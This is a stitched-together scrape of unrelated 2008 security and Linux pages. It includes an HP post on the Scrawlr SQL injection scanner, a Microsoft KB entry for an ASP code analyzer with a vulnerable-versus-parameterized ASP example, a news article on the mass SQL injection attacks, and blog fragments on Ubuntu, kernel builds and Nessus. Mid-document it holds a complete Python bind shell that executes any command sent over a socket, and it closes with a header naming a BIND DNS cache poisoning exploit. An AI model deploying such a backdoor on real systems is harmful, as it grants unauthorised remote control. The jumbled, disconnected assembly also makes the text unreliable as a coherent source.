
You have likely been tracking the mass SQL Injections that are currently sweeping through the net. Just last night I was shopping on www.ihomeaudio.com when I noticed they had been injected (they have since fixed their site). HP started to observe these attacks in January. They spread to over 500,000 sites by April before calming down and then picking up again in May. Most of the sites hit were initially Microsoft IIS ASP applications, which led many security companies to mistake this for some sort of new vulnerability in IIS and led Microsoft to research the possibility, but alas, it's just our old friend, SQL Injection. We now see this attack hitting ASP and PHP sites, and thanks to Google it's easy to see just which sites out there have been hit.
While we were closely following the situation, the nice folks at Microsoft contacted us to see if we could work together to help people identify and cope with this issue. Together we quickly developed an action plan. The Microsoft Security Response Center (MSRC) was in a tough spot: hundreds of thousands of ASP sites were getting hacked, yet the vulnerability wasn't something Microsoft could release a patch for. SQL Injection occurs because poorly written web code interfaces with the website's backend database, and the solution was much more complicated than a simple patch. Developers were going to have to learn about security and patch their own code if they were going to solve this. Microsoft's Security Vulnerability Research & Defense team also has a blog post about this problem where they share Microsoft's recommendations.
Now if you are no stranger to web security, you might be saying "well duh" right about now. Unfortunately, to at least 500,000 sites on the Internet this concept is still pretty new, and if you are one of the folks who are just now learning what SQL Injection is, I highly recommend you read HP's Web Security Research Group white papers on verbose and blind SQL injection, located in our HP application security resource library.
Introducing HP Scrawlr
When Microsoft contacted us, they asked us to equip their customers with the tools necessary to quickly find SQL Injection vulnerabilities in their sites. HP's application security software, DevInspect, QAInspect and WebInspect, all find SQL Injection and countless other security vulnerabilities. DevInspect can even inspect your source code for SQL Injection and guide developers through the process of fixing their code. But what if you just need to quickly look for SQL Injection before you decide how you are going to handle the issue? We needed something quick, highly accurate, and easy to download and install.
Scrawlr, developed by the HP Web Security Research Group in coordination with the MSRC, is short for SQL Injector and Crawler. Scrawlr will crawl a website while simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities. Scrawlr is lightning fast and uses our intelligent engine technology to dynamically craft SQL Injection attacks on the fly. It can even provide proof positive results by displaying the type of backend database in use and a list of available table names. There is no denying you have SQL Injection when I can show you table names!
Technical details for Scrawlr
Scrawlr does have some limitations versus our professional solutions and our fully functional SQL Injector tool
Download Scrawlr
You can download Scrawlr by visiting the following link: https://download.spidynamics.com/products/scrawlr/
Scrawlr is offered as-is and is not a supported product. Assistance may be available from other Scrawlr users in our online Scrawlr forum located at http://www.communities.hp.com/securitysoftware/forums/198.aspx
You can learn more about the HP Web Application Security Group and the HP Application Security Center by visiting our Security Community site at www.communities.hp.com/securitysoftware/ or by visiting our product information page at www.hp.com/go/securitysoftware/
| Article ID | : | 954476 |
| Last modified | : | June 27, 2008 |
| Revision | : | 1.1 |
Prerequisites
• .NET Framework 3.0
• Microsoft ASP.NET 2.0
Parameter list
| Parameter | Option | Description |
|---|---|---|
| /GlobalAsaPath | path | Specifies the path of the Global.asa file. |
| /IncludePaths | paths | Specifies the paths used to resolve files included by virtual path, separated by semicolons. |
| /input | asp file | Specifies the absolute path of the ASP file to analyze. |
| /suppress | warnings | Does not report the listed warnings. |
| /nologo | | Does not display the tool logo. |
| /quiet | | Does not display parsing errors. If you use both the /nologo and /quiet switches, only warning messages are displayed. |
Examples
MSSCASI_ASP /input="c:\source\logon.asp"
MSSCASI_ASP /GlobalAsaPath="C:\source" /input="c:\source\webitems\display.asp"
MSSCASI_ASP /GlobalAsaPath="C:\source" /input="c:\source\webitems\display.asp" /IncludePaths="C:\virtualdirectory1;C:\virtualdirectory2"
MSSCASI_ASP /input="c:\source\webitems\display.asp" /suppress="80406;80407"
Checking the output
| Warning | Description |
|---|---|
| 80400 | Possible SQL injection vulnerability through data read from the Request object without any input validation. These warnings are most likely bugs that must be fixed. |
| 80406 | Possible SQL injection vulnerability through data read from the Request object that is passed through some unknown function call which may perform data validation. If no data validation is performed inside that function, these warnings are most likely bugs; otherwise they are false positives. |
| 80403 | Possible SQL injection vulnerability through data that comes from back-end servers. If that data is controlled by end users through other websites, these warnings are most likely bugs. If the data is highly trusted, these warnings may not be bugs, but parameterizing the queries is still good practice as part of a defense-in-depth strategy. |
| 80407 | Possible SQL injection vulnerability through data that comes from back-end servers and is passed through some unknown function call. If that data is controlled by end users through other websites and no data validation is performed on it, these warnings are most likely bugs. |
| 80420 | Possible SQL injection vulnerability through function parameters. These warnings are generated at function scope, so if the parameter values come from trusted sources they are false positives; if the parameter values are controlled by end users, they are most likely bugs. You can use the __sql_pre_validated annotation on these function parameters to detect whether end users can reach this code. |
| 80421 | Possible SQL injection vulnerability through function parameters that are passed through some unknown function call which may perform data validation. You can use the __sql_pre_validated annotation on these function parameters and the __sql_validate annotation on the validation function to detect whether end users can reach this code. |
Limitations
• This tool can only parse ASP code written in VBScript. It cannot currently parse server-side code written in any other language (such as JScript).
• As part of developing this tool, we built a new ASP parser. This parser does not cover every ASP construct, so you may see some parsing errors.
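As an added illustration (not code from KB 954476 or any Microsoft sample), here is the classic ASP/VBScript pattern that produces warning 80400 next to the parameterized rewrite the warning table recommends. It assumes an open ADODB.Connection named conn and a Products table with ProductId and Name columns; both are hypothetical.

```asp
<%
' Added example, not from the KB article: the pattern MSSCASI_ASP reports
' as warning 80400, beside the parameterized form it recommends.
' Assumes an open ADODB.Connection "conn" and a table Products(ProductId, Name).
Option Explicit
' ADO constants normally pulled in from adovbs.inc
Const adInteger = 3
Const adParamInput = 1

' --- Vulnerable: Request data is concatenated straight into the SQL text ---
' Request.QueryString("id") reaches the query without any validation, so the
' analyzer flags the Execute call with warning 80400.
Function GetProductNameUnsafe(conn)
    Dim sql, rs
    sql = "SELECT Name FROM Products WHERE ProductId = " & Request.QueryString("id")
    Set rs = conn.Execute(sql)
    If Not rs.EOF Then GetProductNameUnsafe = rs("Name")
    rs.Close
End Function

' --- Hardened: the value travels as a typed parameter, never as SQL text ---
Function GetProductNameSafe(conn)
    Dim cmd, rs, rawId
    rawId = Request.QueryString("id")
    ' Reject anything that is not numeric before it gets near the database.
    If Not IsNumeric(rawId) Then
        Response.Status = "400 Bad Request"
        Exit Function
    End If
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandText = "SELECT Name FROM Products WHERE ProductId = ?"
    ' The driver sends the integer separately from the statement text, so
    ' no input value can change the shape of the query.
    cmd.Parameters.Append cmd.CreateParameter("id", adInteger, adParamInput, , CLng(rawId))
    Set rs = cmd.Execute
    If Not rs.EOF Then GetProductNameSafe = rs("Name")
    rs.Close
End Function
%>
```

Running MSSCASI_ASP over a file containing only the second function should produce no 80400 warning, since no Request data is concatenated into a query string.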
By Robert Westervelt, News Editor
24 Jun 2008 | SearchSecurity.com
Microsoft is alerting customers to several tools that could bolster Web application development in the wake of a rising number of SQL injection attacks targeting faulty code in websites.
The software giant recommended customers use the tools in a security advisory Tuesday. It warned customers that it was tracking a rising number of attacks on websites that use Microsoft ASP and ASP.NET technologies. The problem lies with tiny software coding flaws that are difficult to detect.
"These SQL injection attacks do not exploit a specific software vulnerability, but instead, target websites that do not follow secure coding practices for accessing and manipulating data stored in a relational database," said Bill Sisk, Microsoft's security response communications (MSRC) manager.
Researchers had been tracking the mass SQL injection on thousands of websites over the last several months. The attacks are automated, using a number of hacker toolkits that can be purchased on the black market. Ultimately, the attack triggers an error on the server hosting the Web application, allowing the attacker to insert his own code and gain access to the system. It's unclear how many sites have been compromised.
In its advisory to customers, Microsoft identified Scrawlr, a vulnerability scanner co-developed by Hewlett Packard and researchers at the MSRC, which identifies whether a website is susceptible to SQL injection. In a blog entry, HP's Erik Peterson, senior director of products for the application security center, said the tool is not as robust as the vendor's fully supported products, but it is a free and fast way to analyze a website for potential problems. The tool can't identify the line of code responsible and will only crawl up to 1,500 pages. It doesn't support sites requiring authentication and won't test forms for SQL injection, among other limitations, he said.
UrlScan version 3.0 Beta is a tool developed by Microsoft that blocks HTTP requests. Microsoft said the tool will stop harmful requests from reaching the Web application on the server. The tool reads its configuration from the urlscan.ini file. Multiple instances of the tool can be installed to serve as URL filters. It can be tweaked by an administrator to restrict the types of requests processed by Internet Information Services (IIS).
Microsoft Source Code Analyzer for SQL Injection is also available to detect ASP code susceptible to SQL injection attacks. It generates a report that displays the coding issue. Microsoft admits that the tool also has some limitations -- it only addresses ASP code written in VBScript, and its use could result in some parsing errors.
Putting the tools in the hands of Web developers and IT administrators could help accelerate security awareness in the same way poor product quality did in the mid-90s, said Amrit Williams, a former Gartner analyst, now chief technology officer at BigFix. Williams cautioned that the tools are not a substitute for more advanced technologies or experienced and thorough human analysis.
"Unfortunately it always takes a significant incident to drive folks towards doing the right thing," Williams said in an email exchange. "This is especially true of security as part of the software development life cycle and even more so for Web development, which tends to be rapid, ad-hoc and less structured than traditional software development."
A simple experiment I did recently. The reason for doing it was, again, a question that came up while discussing things with a customer. Customers are getting stronger and stronger; I already feel I can't keep up with them, and if we don't work harder we will all be out of a job soon :P
#deb cdrom:[Ubuntu 8.04 _Hardy Heron_ - Release i386 (20080423)]/ hardy main restricted
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.
deb http://cn.archive.ubuntu.com/ubuntu/ hardy main restricted
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy main restricted
## Major bug fix updates produced after the final release of the
## distribution.
deb http://cn.archive.ubuntu.com/ubuntu/ hardy-updates main restricted
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy-updates main restricted
## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
## team, and may not be under a free licence. Please satisfy yourself as to
## your rights to use the software. Also, please note that software in
## universe WILL NOT receive any review or updates from the Ubuntu security
## team.
deb http://cn.archive.ubuntu.com/ubuntu/ hardy universe
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy universe
deb http://cn.archive.ubuntu.com/ubuntu/ hardy-updates universe
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy-updates universe
## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
## team, and may not be under a free licence. Please satisfy yourself as to
## your rights to use the software. Also, please note that software in
## multiverse WILL NOT receive any review or updates from the Ubuntu
## security team.
deb http://cn.archive.ubuntu.com/ubuntu/ hardy multiverse
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy multiverse
deb http://cn.archive.ubuntu.com/ubuntu/ hardy-updates multiverse
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy-updates multiverse
## Uncomment the following two lines to add software from the 'backports'
## repository.
## N.B. software from this repository may not have been tested as
## extensively as that contained in the main release, although it includes
## newer versions of some applications which may provide useful features.
## Also, please note that software in backports WILL NOT receive any review
## or updates from the Ubuntu security team.
# deb http://cn.archive.ubuntu.com/ubuntu/ hardy-backports main restricted universe multiverse
# deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy-backports main restricted universe multiverse
## Uncomment the following two lines to add software from Canonical's
## 'partner' repository. This software is not part of Ubuntu, but is
## offered by Canonical and the respective vendors as a service to Ubuntu
## users.
# deb http://archive.canonical.com/ubuntu hardy partner
# deb-src http://archive.canonical.com/ubuntu hardy partner
# Line commented out by installer because it failed to verify:
#deb http://security.ubuntu.com/ubuntu hardy-security main restricted
# Line commented out by installer because it failed to verify:
#deb-src http://security.ubuntu.com/ubuntu hardy-security main restricted
# Line commented out by installer because it failed to verify:
#deb http://security.ubuntu.com/ubuntu hardy-security universe
# Line commented out by installer because it failed to verify:
#deb-src http://security.ubuntu.com/ubuntu hardy-security universe
# Line commented out by installer because it failed to verify:
#deb http://security.ubuntu.com/ubuntu hardy-security multiverse
# Line commented out by installer because it failed to verify:
#deb-src http://security.ubuntu.com/ubuntu hardy-security multiverse
deb http://ubuntu.cn99.com/ubuntu/ gutsy main restricted universe multiverse
deb http://ubuntu.cn99.com/ubuntu/ gutsy-security main restricted universe multiverse
deb http://ubuntu.cn99.com/ubuntu/ gutsy-updates main restricted universe multiverse
deb http://ubuntu.cn99.com/ubuntu/ gutsy-proposed main restricted universe multiverse
deb http://ubuntu.cn99.com/ubuntu/ gutsy-backports main restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ gutsy main restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ gutsy-security main restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ gutsy-updates main restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ gutsy-proposed main restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ gutsy-backports main restricted universe multiverse
deb http://ubuntu.cn99.com/ubuntu-cn/ gutsy main restricted universe multiverse
deb http://www.debian-multimedia.org etch main
deb http://www.debian-multimedia.org testing main
Recently, for various reasons, I needed to replace the Linux kernel. I wrote down the procedure and welcome your criticism:
Original system: Fedora Core 9
Linux localhost.localdomain 2.6.25-14.fc9.i686 #1 SMP Thu May 1 06:28:41 EDT 2008 i686 i686 i386 GNU/Linux
Needs to be downgraded to:
linux-2.6.24.6
Steps:
[root@localhost ~]# cd /usr/local/sbin
[root@localhost sbin]# wget http://www.de.kernel.org/pub/linux/kernel/v2.6/linux-2.6.24.6.tar.gz
[root@localhost sbin]# tar -zxvf linux-2.6.24.6.tar.gz
[root@localhost sbin]# mv linux-2.6.24.6 linux
[root@localhost sbin]# ln -s /usr/local/sbin/linux /usr/src/linux
[root@localhost sbin]# cd /usr/src/linux
[root@localhost linux]# make mrproper    <-- remove old .o files; on a first build this step can actually be skipped
[root@localhost linux]# make menuconfig
[root@localhost linux]# make dep    <-- build the dependencies; on a first build this step can actually be skipped
*** Warning: make dep is unnecessary now.
[root@localhost linux]# make clean    <-- remove unneeded files
[root@localhost linux]# make bzImage    <-- compile the kernel
[root@localhost linux]# make modules    <-- compile the modules
[root@localhost linux]# make modules_install    <-- install the modules
[root@localhost linux]# make install    <-- this step builds the initrd (the image used to load LKMs)
[root@localhost linux]# new-kernel-pkg --install --mkinitrd --depmod 2.6.24.6    <-- write the entry into grub.conf
[root@localhost linux]# shutdown -r now
After the reboot, the result is:
Linux localhost.localdomain 2.6.24.6 #1 SMP Tue Aug 26 23:15:14 CST 2008 i686 i686 i386 GNU/Linux
#!/usr/bin/python
#code by demonalex@163.com
import socket
import os

address = raw_input("Server Address:")
print "Repeat: Server Address:", address, "!"
port = raw_input("Port:")
print "Repeat: Port:", port, "!"
HOST = address
PORT = int(port)

# listen on the given address/port and serve a single TCP client
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 6)
s.bind((HOST, PORT))
s.listen(1)
conn, addr = s.accept()
#print "Connect by ", addr, "!"

while 1:
    # prompt shows the current working directory
    conn.send("(")
    conn.send(os.getcwd())
    conn.send(")command:")
    data = conn.recv(1024)
    if not data: break
    #print data, ":", len(data)
    # "cd <dir>" changes directory instead of being run as a command
    if data[0:3] == 'cd ':
        curr_dir = data[3:].strip()
        os.chdir(curr_dir)
        continue
    # a bare drive letter such as "d:" also changes directory
    if len(data) == 3 and data[1] == ':':
        curr_dir = data.strip()
        os.chdir(curr_dir)
        continue
    if data == "exit\n":
        conn.send("bye!\n")
        break
    # everything else is run through the shell and its output sent back
    result = os.popen(data).read()
    conn.send(result)

conn.close()
s.close()
Installing nessus on Ubuntu
writer: demonalex[at]dark2s[dot]org
{Environment}
Operating system: Ubuntu 8.04 Desktop (2.6.24-16-generic #1 SMP)
nessus: version 2.2.9
{Installation}
root@demonalex-laptop:~# apt-get update
root@demonalex-laptop:~# apt-get -y install nessus nessusd nessus-plugins
{Configuration}
After the installation finishes, add a user with nessus-adduser:
root@demonalex-laptop:~# nessus-adduser
Using /var/tmp as a temporary file holder
Add a new nessusd user
----------------------
Login : admin    <-- enter the new user name
Authentication (pass/cert) [pass] :    <-- press Enter (password authentication)
Login password :    <-- enter the password
Login password (again) :    <-- enter the password again
User rules
----------
nessusd has a rules system which allows you to restrict the hosts
that admin has the right to test. For instance, you may want
him to be able to scan his own host only.
Please see the nessus-adduser(8) man page for the rules syntax
Enter the rules for this user, and hit ctrl-D once you are done :
(the user can have an empty rules set)
<-- press Ctrl+D to continue
Login : admin
Password : ***********
DN :
Rules :
Is that ok ? (y/n) [y]    <-- press Enter (confirm the add)
user added.
root@demonalex-laptop:/usr/bin# nessus-fetch --register <your serial number>
{Update}
root@demonalex-laptop:~# nessus-update-plugins
{Run}
First start the server:
root@demonalex-laptop:~# nessusd -D
Then go to the desktop and run "Application->Internet->Nessus" from the Panel. In the nessus GUI client that opens, enter the account and password on the "Nessusd Host" tab and press "Log in". After a successful login it switches automatically to the "Plugins" tab; select the plugins to scan with, then go to the "Target" tab, enter the target IP address, and finally press "Start the scan". Once the scan finishes, the report window appears.
Run result:
In addition, a log file named uselog.txt is generated in the same directory. This continues my earlier "get" series of programs, but this time it is "open source", haha :D. Since it is still pretty rough, I hope you experts can help improve it :P. The code and test material can be downloaded here: www.i170.com/Attach/39450C6D-8D05-4493-91B0-E2FC48458768
If you don't want to download it, you can read the code directly below:
#BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)
#http://www.milw0rm.com/exploits/6123